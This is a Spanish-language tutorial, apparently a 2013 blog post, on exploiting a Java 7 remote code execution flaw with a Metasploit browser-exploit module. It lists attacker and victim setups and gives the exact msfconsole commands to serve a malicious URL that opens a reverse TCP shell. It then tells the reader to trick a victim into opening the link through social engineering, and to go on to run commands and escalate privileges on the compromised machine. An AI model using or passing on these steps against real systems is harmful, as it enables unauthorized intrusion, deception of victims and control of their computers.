Hoy 23 de Enero, Oracle nuevamente
es blanco de los "Hackers", pues se ha publicado una nueva
vulnerabilidad que afectan a las versiones de Java 7u7-10 y anteriores,
permitiendo a un atacante ejecutar código remoto en el sistema de la
victima (Windows - Linux - MAC), para ello el equipo de Metasploit ha desarrollado un modulo denominado java_jre17_glassfish_averagerangestatisticimpl que facilita el trabajo a un atacante en el proceso de explotacion de esta nueva vulnerabilidad.
El respectivo modulo se puede obtener con tal solo ejecutar el comando
msfupdate y los pasos para aprovecharse de esta vulnerabilidad, son los
siguientes:
REQUERIMIENTOS:
BackTrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 - 8 (Victima)
Java 7 Update 7 (Victima)
PROCEDIMIENTOS:
En la terminal/consola tecleamos msfconsole y seguidamente ejecutamos los siguientes comandos:
-------------------------------------------------------------------------------------------------------------
use exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
set payload java/shell_reverse_tcp
set LHOST 192.168.1.33
set URIPATH /
exploit
-------------------------------------------------------------------------------------------------------------
Como ya es de conocimiento, tenemos que ejecutar estos comandos para
poder generar una URL que contendrá los archivos maliciosos que se
ejecutaran en el navegador de la victima, como también generar
la conexión entre el ordenador de la victima y la nuestra.
Después de realizar dicho paso, es necesario enviar el LINK malicioso,
ya sea con nuestra IP o cualquier otro Fake y usar la Ing. Social para
que la victima pueda abrir desde su navegador nuestro LINK. Dicho link
enviara 2 archivos en formato .jar y otro que es un simple icono.
Si los archivos que Metasploit ha enviado se ejecutan de una forma
exitosa, esta automáticamente generara una conexión reversa entre el
ordenador de la victima y la nuestra, permitiendonos ejecutar cualquier
tipo de comandos para aprovecharnos del sistema vulnerado y tratar de
escalar privilegios siempre y cuando sea de nuestro interés.
El exploit y ataque se realizo contra un Sistema Operativo Windows 7 con la versión de Java 1.7.0_07-b10.
Referencia: http://metasploit.com/modules/exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
Saludos.